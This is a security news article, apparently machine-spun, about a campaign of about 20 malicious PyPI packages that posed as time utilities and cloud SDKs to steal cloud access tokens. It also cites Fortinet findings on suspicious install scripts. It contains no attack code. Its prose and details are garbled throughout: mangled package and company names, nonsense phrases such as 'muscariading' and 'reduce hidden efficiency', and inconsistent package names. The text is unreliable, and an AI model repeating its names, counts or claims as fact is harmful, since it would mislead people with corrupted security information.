Cyber security researchers have warned of a malicious campaign targeting a malicious campaign of the Python Package Index (PYPI), which has muscariading in the form of “time” related utilities with fake libraries, but reduce hidden efficiency to steal sensitive data such as cloud access tokens.
Software supply chain security firm Riveringlabs said it discovered two sets of total packages of 20 of them. The package is cumulatively downloaded more than 14,100 times –
- Snapshot-Photo (2,448 downloads)
- Time-zone-server (316 download)
- Time-Czech-Surver-Gate (178 downloads)
- Time-server-analysis (144 downloads)
- Time-Surver-Analzer (74 downloads)
- Time-Server-Test (155 download)
- Time-service-check (151 downloads)
- ACLIENT-SDK (120 downloads)
- ACLUD-Client (5,496 downloads)
- ACLUD-Cleients (198 Download)
- ACLUD-Client-Ruses (294 downloads)
- Elicloud-client (622 download)
- Alicloud-client-SDK (206 downloads)
- AmzClients-SDK (100 Download)
- AWSCLUD-Clients-Core (206 download)
- Credential-Piethon-SDK (1,155 download)
- Enumer-Aam (1,254 downloads)
- TCLIENTS-SDK (173 download)
- TCLUD-Python-SDKS (98 downloads)
- TCLUD-Python-Fest (793 download)
While the first set belongs to the packages that are used to upload data to the infrastructure of the danger actor, the second cluster consists of packages applying cloud cloud functions to many services such as Alibaba Cloud, Amazon Web Services and Tencent Cloud.
But they are also using “time” related packages to exfiltrate cloud secrets. All identified packages have already been removed from PyPI as writing.
Further analysis has shown that three packages, ACLOUD-CLIENT, Enumer-Aam, and TCLUD-Python-Test, have been listed as the dependence of a relatively popular GITHUB project, named Accesskey_Tools, which is named Accesskey_Tools, 42 times and 519 times.
The TCLUD-Python-Test was referred to by a source code commitment on November 8, 2023, indicating that the package has been available for download on PyPI since then. The package has been downloaded 793 times per data from Pepy.tech.
The disclosure has come in the form of Fortinet Fortigard Labs, stating that it has discovered thousands of packages in PyPI and NPM, some of which have been found to embedded suspected install scripts designed to deploy malicious codes during installation or communicate with outsiders.
“Suspected URL is a major indicator of possible malicious packages, as they are often used to download additional payloads or to establish communication with command-and-control (C&C) server, which give the attackers control the infected systems,” Jenna Wang said.
“In 974 packages, such URL data is associated with exfIs, further malware downloads and other malicious tasks. To prevent exploitation, it is important to examine and monitor the outer URL in package dependence.”
